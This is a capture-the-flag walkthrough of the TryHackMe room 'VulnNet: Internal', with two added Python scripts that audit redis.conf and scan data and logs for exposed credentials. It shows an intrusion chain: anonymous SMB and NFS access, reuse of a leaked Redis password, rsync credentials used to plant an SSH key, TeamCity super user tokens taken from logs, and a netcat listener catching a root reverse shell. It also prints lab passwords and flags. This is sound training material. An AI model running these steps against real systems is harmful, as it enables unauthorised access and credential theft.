- Room author: TheCyb3rW0lf
- Operating system: Linux (required)
- Difficulty: Easy/Medium
LINK: https://tryhackme.com/room/vulnnetinternal
Description:
VulnNet Entertainment is a company that learns from its mistakes. They quickly realized they could not build a properly secured web application, so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you are tasked with performing a penetration test of their network and reporting your findings.
This machine was designed to be the exact opposite of the previous machines in this series and focuses on internal services. It should show you how to retrieve interesting information and use it to gain access to the system. Report your findings by submitting the correct flags.
LET'S START BY FINDING THE SERVICES FLAG:
We begin with an Nmap scan for open ports:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35973/tcp mountd
| 100005 1,2,3 50743/udp mountd
| 100005 1,2,3 50821/tcp6 mountd
| 100005 1,2,3 60228/udp6 mountd
| 100021 1,3,4 33804/udp6 nlockmgr
| 100021 1,3,4 35968/udp nlockmgr
| 100021 1,3,4 38965/tcp6 nlockmgr
| 100021 1,3,4 44305/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
6379/tcp open redis Redis key-value store
9090/tcp filtered zeus-admin
35973/tcp open mountd 1-3 (RPC #100005)
39613/tcp open mountd 1-3 (RPC #100005)
42041/tcp open java-rmi Java RMI
44305/tcp open nlockmgr 1-4 (RPC #100021)
49833/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Let's enumerate the Samba shares:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient -L 10.10.190.83
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Fortunately we can connect to the "shares" share without credentials and read services.txt, which contains the flag we need:
┌──(user㉿parrot)-[/data/VulnNet_Internal]
└─$ smbclient //10.10.190.83/shares
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 2 10:20:09 2021
.. D 0 Tue Feb 2 10:28:11 2021
temp D 0 Sat Feb 6 12:45:10 2021
data D 0 Tue Feb 2 10:27:33 2021
11309648 blocks of size 1024. 3275768 blocks available
smb: \> cd temp
smb: \temp\> ls
. D 0 Sat Feb 6 12:45:10 2021
.. D 0 Tue Feb 2 10:20:09 2021
services.txt N 38 Sat Feb 6 12:45:09 2021
11309648 blocks of size 1024. 3275768 blocks available
smb: \temp\> get services.txt -
THM{0a09d51e488f5fa105d8d866a497440a}
getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
We have therefore found the FLAG: THM{0a09d51e488f5fa105d8d866a497440a}
LET'S MOVE ON TO THE INTERNAL FLAG:
The Nmap scan also revealed an NFS export (port 2049); let's mount it and inspect its contents:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ tree tmp
tmp
└── opt
└── conf
├── hp
│ └── hplip.conf
├── init
│ ├── anacron.conf
│ ├── lightdm.conf
│ └── whoopsie.conf
├── opt
├── profile.d
│ ├── bash_completion.sh
│ ├── cedilla-portuguese.sh
│ ├── input-method-config.sh
│ └── vte-2.91.sh
├── redis
│ └── redis.conf
├── vim
│ ├── vimrc
│ └── vimrc.tiny
└── wildmidi
└── wildmidi.cfg
Note that redis.conf contains the password for the Redis server:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ grep -Ev "^#|^$" redis.conf
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
daemonize yes
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16
always-show-logo yes
save 900 1
save 300 10
save 60 10000
stop-writes-on-bgsave-error yes
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir /var/lib/redis
slave-serve-stale-data yes
requirepass "B65Hx562F@ggAZ@F" <-------------------- password
slave-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
slave-priority 100
lazyfree-lazy-eviction no
lazyfree-lazy-expire no
lazyfree-lazy-server-del no
slave-lazy-flush no
appendonly no
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
aof-use-rdb-preamble no
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit slave 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
aof-rewrite-incremental-fsync yes
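Before using that password it is worth noting what the exported file tells a defender. The Python script below is an added example, not part of the original writeup: it parses a redis.conf (SAMPLE_REDIS_CONF is a constructed excerpt reproducing the directives seen above) and reports the settings that matter once the file leaks. It also flags the inconsistency visible on this box: the file binds Redis to loopback only, yet Nmap found 6379 open from the outside and ss later shows it listening on 0.0.0.0:6379, so the exported copy is not the one the running instance uses. The check names, messages and the SENSITIVE_COMMANDS list are the author's own choices.

```python
"""Audit a redis.conf for settings that matter once the file itself leaks.

Added example, not part of the original writeup. SAMPLE_REDIS_CONF is a
constructed excerpt reproducing the directives seen in the exported file;
the checks, messages and the SENSITIVE_COMMANDS list are the author's choice.
"""

# Commands worth renaming or disabling on an instance reachable by other hosts
SENSITIVE_COMMANDS = {"FLUSHDB", "FLUSHALL", "CONFIG", "DEBUG", "KEYS",
                      "SLAVEOF", "REPLICAOF"}

SAMPLE_REDIS_CONF = """\
# constructed excerpt of the redis.conf found on the NFS export
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "B65Hx562F@ggAZ@F"
"""

LOOPBACK = {"127.0.0.1", "::1"}


def parse_redis_conf(text):
    """Return (directives, renamed): directives maps a lower-case directive to
    its argument list (last occurrence wins); renamed maps each renamed command
    to its new name ("" when the command was disabled)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        key, args = parts[0].lower(), parts[1:]
        if key == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1].strip('"')
        else:
            directives[key] = args
    return directives, renamed


def audit_redis_conf(text, observed_listen_all=False):
    """Return a list of human-readable findings for the given redis.conf text.
    Set observed_listen_all=True when the running server was seen listening on
    all interfaces (as Nmap and ss showed for this host)."""
    directives, renamed = parse_redis_conf(text)
    findings = []

    if not directives.get("requirepass"):
        findings.append("no requirepass: anyone who can reach the port has full access")
    else:
        findings.append("requirepass is stored in clear text: anyone who can read this file "
                        "(for example through the NFS export) can authenticate to Redis")

    binds = directives.get("bind", [])
    if not binds or any(b in ("0.0.0.0", "*") for b in binds):
        findings.append("bind covers all interfaces")
    elif observed_listen_all and all(b in LOOPBACK for b in binds):
        findings.append("file binds loopback only but the server listens on all interfaces: "
                        "the running instance is not using this file")

    if directives.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode is off")

    missing = sorted(c for c in SENSITIVE_COMMANDS if c not in renamed)
    if missing:
        findings.append("commands not renamed or disabled: " + ", ".join(missing))
    return findings


if __name__ == "__main__":
    for finding in audit_redis_conf(SAMPLE_REDIS_CONF, observed_listen_all=True):
        print("-", finding)
```

Run as-is it reports three findings for the constructed excerpt: the clear-text password, the bind/listener mismatch, and the dangerous commands (CONFIG, DEBUG, KEYS, SLAVEOF, REPLICAOF) that were left with their default names. Point it at a real redis.conf by reading the file into a string and passing it to audit_redis_conf.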
Let's connect to Redis with that password and look for the flag:
┌──(user㉿parrot)-[/data/…/files/opt/conf/redis]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> ping
PONG
10.10.190.83:6379> KEYS *
1) "tmp"
2) "marketlist"
3) "authlist"
4) "internal flag"
5) "int"
10.10.190.83:6379>
10.10.190.83:6379> KEYS "internal flag"
1) "internal flag"
10.10.190.83:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"
The flag is: THM{ff8e518addbbddb74531a724236a8221}
USER FLAG:
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379>
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83
files          Necessary home interaction
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83
sys-internal@vulnnet-internal:~$ cat user.txt
THM{da7c20696831f253e0afaca8b83c07ab}
USER FLAG: THM{da7c20696831f253e0afaca8b83c07ab}
ROOT FLAG:
sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ./
drwxr-xr-x 24 root root 4096 Feb 6 12:58 ../
drwxr-xr-x 2 root root 4096 Feb 2 14:05 bin/
drwxr-xr-x 3 root root 4096 Feb 1 14:02 boot/
drwx------ 2 root root 4096 Feb 1 13:41 .cache/
drwxr-xr-x 17 root root 3720 May 27 07:34 dev/
drwxr-xr-x 129 root root 12288 Feb 7 19:21 etc/
drwxr-xr-x 3 root root 4096 Feb 1 13:51 home/
lrwxrwxrwx 1 root root 34 Feb 1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx 1 root root 33 Feb 1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x 18 root root 4096 Feb 1 13:43 lib/
drwxr-xr-x 2 root root 4096 Feb 1 13:28 lib64/
drwx------ 2 root root 16384 Feb 1 13:27 lost+found/
drwxr-xr-x 4 root root 4096 Feb 2 10:49 media/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 mnt/
drwxr-xr-x 4 root root 4096 Feb 2 10:28 opt/
dr-xr-xr-x 136 root root 0 May 27 07:33 proc/
drwx------ 8 root root 4096 Feb 6 13:32 root/
drwxr-xr-x 27 root root 880 May 27 08:37 run/
drwxr-xr-x 2 root root 4096 Feb 2 14:06 sbin/
drwxr-xr-x 2 root root 4096 Feb 1 13:27 srv/
-rw------- 1 root root 546529280 Feb 1 13:27 swapfile
dr-xr-xr-x 13 root root 0 May 27 08:39 sys/
drwxr-xr-x 12 root root 4096 Feb 6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt 11 root root 4096 May 27 08:40 tmp/
drwxr-xr-x 10 root root 4096 Feb 1 13:27 usr/
drwxr-xr-x 13 root root 4096 Feb 1 13:43 var/
lrwxrwxrwx 1 root root 31 Feb 1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx 1 root root 30 Feb 1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic
sys-internal@vulnnet-internal:~$ ss -ltp
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 0.0.0.0:microsoft-ds 0.0.0.0:*
LISTEN 0 128 0.0.0.0:39391 0.0.0.0:*
LISTEN 0 64 0.0.0.0:nfs 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33735 0.0.0.0:*
LISTEN 0 5 0.0.0.0:rsync 0.0.0.0:*
LISTEN 0 50 0.0.0.0:netbios-ssn 0.0.0.0:*
LISTEN 0 128 0.0.0.0:6379 0.0.0.0:*
LISTEN 0 128 0.0.0.0:sunrpc 0.0.0.0:*
LISTEN 0 64 0.0.0.0:34769 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:domain 0.0.0.0:*
LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:*
LISTEN 0 5 127.0.0.1:ipp 0.0.0.0:*
LISTEN 0 128 0.0.0.0:33145 0.0.0.0:*
LISTEN 0 50 [::ffff:127.0.0.1]:57882 *:*
LISTEN 0 50 [::]:microsoft-ds [::]:*
LISTEN 0 64 [::]:nfs [::]:*
LISTEN 0 50 *:9090 *:*
LISTEN 0 1 [::ffff:127.0.0.1]:8105 *:*
LISTEN 0 5 [::]:rsync [::]:*
LISTEN 0 128 [::1]:6379 [::]:*
LISTEN 0 50 [::]:netbios-ssn [::]:*
LISTEN 0 100 [::ffff:127.0.0.1]:8111 *:* <------------ TeamCity running on localhost on port 8111
LISTEN 0 128 [::]:sunrpc [::]:*
LISTEN 0 64 [::]:33363 [::]:*
LISTEN 0 128 [::]:40659 [::]:*
LISTEN 0 128 [::]:ssh [::]:*
LISTEN 0 50 *:35095 *:*
LISTEN 0 128 [::]:38359 [::]:*
LISTEN 0 5 [::1]:ipp [::]:*
LISTEN 0 128 [::]:46425 [::]:*
$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83
sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
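The authlist entries and the TeamCity log lines above share one root cause: a credential written in clear text (or merely base64-wrapped) where any user who can read the store or the log can pick it up. The Python script below is an added example, not part of the original writeup, and serves both passages: it scans a list of values for password phrases, credential-bearing URLs and TeamCity super user token lines, decoding base64 entries first, deduplicating repeated secrets and redacting them in the report. The sample inputs are constructed from the strings quoted above; the pattern set, the plausibility filter and the redaction rule are the author's own assumptions.

```python
"""Find credentials exposed in data-store values and application logs.

Added example, not part of the original writeup. The sample inputs are
constructed: AUTHLIST_B64 reuses the base64 entry read from the Redis
"authlist" key, and SAMPLE_TEAMCITY_LOG mimics the catalina.out lines found
with grep. Pattern set, plausibility filter and redaction are the author's own.
"""
import base64
import binascii
import re

AUTHLIST_B64 = "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="

_SUFFIX = " (use empty username with the token as the password to access the server)"
SAMPLE_TEAMCITY_LOG = [
    "[TeamCity] Super user authentication token: " + token + _SUFFIX
    for token in ("8446629153054945175", "8446629153054945175", "3782562599667957776",
                  "5812627377764625872", "4174796436262174108", "4174796436262174108")
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# kind -> pattern; group 1 (if present) is the secret, otherwise the whole match
SECRET_PATTERNS = {
    "password phrase": re.compile(r"\bpassword\s+(\S+)", re.IGNORECASE),
    "credential url": re.compile(r"\b\w+://[^/\s:@]+@\S+"),
    "teamcity super user token": re.compile(r"Super user authentication token:\s*(\d+)"),
}


def maybe_base64_decode(value):
    """Decode value if it is base64 wrapping printable text; otherwise None."""
    candidate = value.strip()
    if not B64_RE.match(candidate):
        return None
    try:
        text = base64.b64decode(candidate, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.strip().isprintable() else None


def is_plausible_secret(s):
    """Drop captures such as the 'to' in 'password to' that are ordinary words."""
    return len(s) >= 8 and (any(c.isdigit() for c in s) or not s.isalnum())


def redact(secret):
    """Keep only the first two characters so the report does not re-leak the secret."""
    return secret[:2] + "*" * (len(secret) - 2)


def scan_values(source, values):
    """Return one finding per distinct (kind, secret) across all values.
    Each value is checked as-is and, if it is base64, also after decoding."""
    findings, seen = [], set()
    for idx, value in enumerate(values):
        decoded = maybe_base64_decode(value)
        for text, via_b64 in ((value, False), (decoded, True)):
            if text is None:
                continue
            for kind, pattern in SECRET_PATTERNS.items():
                for m in pattern.finditer(text):
                    secret = m.group(1) if m.groups() else m.group(0)
                    if not is_plausible_secret(secret) or (kind, secret) in seen:
                        continue
                    seen.add((kind, secret))
                    findings.append({"source": source, "index": idx, "kind": kind,
                                     "secret": redact(secret), "via_base64": via_b64})
    return findings


if __name__ == "__main__":
    report = scan_values("redis:authlist", [AUTHLIST_B64] * 3)
    report += scan_values("/TeamCity/logs/catalina.out", SAMPLE_TEAMCITY_LOG)
    for f in report:
        print(f"{f['source']}[{f['index']}] {f['kind']}: {f['secret']}"
              + (" (base64-wrapped)" if f["via_base64"] else ""))
```

On the constructed inputs the three identical authlist entries collapse to two findings (the rsync password phrase and the rsync-connect@127.0.0.1 URL, both reached only after base64 decoding), and the six log lines collapse to four distinct super user tokens; the "password to access" wording in the log is discarded by the plausibility filter.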
┌──(user㉿parrot)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
ROOT FLAG: THM{e8996faea46df09dba5676dd271c60bd}